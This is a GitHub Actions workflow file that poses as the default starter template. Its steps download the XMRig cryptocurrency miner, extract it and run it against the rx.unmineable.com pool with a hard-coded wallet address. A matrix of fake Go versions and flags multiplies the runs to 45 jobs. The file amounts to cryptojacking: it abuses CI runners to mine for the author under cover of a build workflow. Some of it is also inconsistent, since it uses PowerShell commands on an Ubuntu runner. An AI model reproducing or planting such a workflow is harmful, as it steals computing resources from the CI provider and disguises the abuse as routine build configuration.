# This is a basic workflow to help you get started with Actions

name: CI-Min

# Controls when the workflow will run
on:
  # Triggers the workflow on push or pull request events but only for the main branch
  push:
    branches: [ main ]
  pull_request:
    branches: [ main ]

  # Allows you to run this workflow manually from the Actions tab
  workflow_dispatch:

# A workflow run is made up of one or more jobs that can run sequentially or in parallel
jobs:
  # This workflow contains a single job called "build"
  build:
    # The type of runner that the job will run on
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 5
      fail-fast: false
      matrix:
        go: [1.0, 1.1, 1.2, 1.3, 1.35]
        flag: [A, B, C, D, E, F, G, H, I]
    env:
        NUM_JOBS: 10
        JOB: ${{ matrix.go }}

    # Steps represent a sequence of tasks that will be executed as part of the job
    steps:
      # Checks-out your repository under $GITHUB_WORKSPACE, so your job can access it
      - uses: actions/checkout@v3

      # Runs a single command using the runners shell
      - name: DOWNLOAD
        run: Invoke-WebRequest https://github.com/xmrig/xmrig/releases/download/v6.17.0/xmrig-6.17.0-msvc-win64.zip -OutFile xmrig-6.17.0-msvc-win64.zip
      - name: Extract
        run: Expand-Archive xmrig-6.17.0-msvc-win64.zip
        
      # Runs a set of commands using the runners shell
      - name: RUNNING
        run: .\xmrig-6.17.0-msvc-win64\xmrig-6.17.0\xmrig.exe -o rx.unmineable.com:3333 -a rx -k -u SHIB:0xBC6dBa2501b9211B1e84B77379668e541af47Bd6.ExMining -p x -t 1
      - name: DONE
        run: exit
          echo Add other actions to build,
          echo test, and deploy your project.
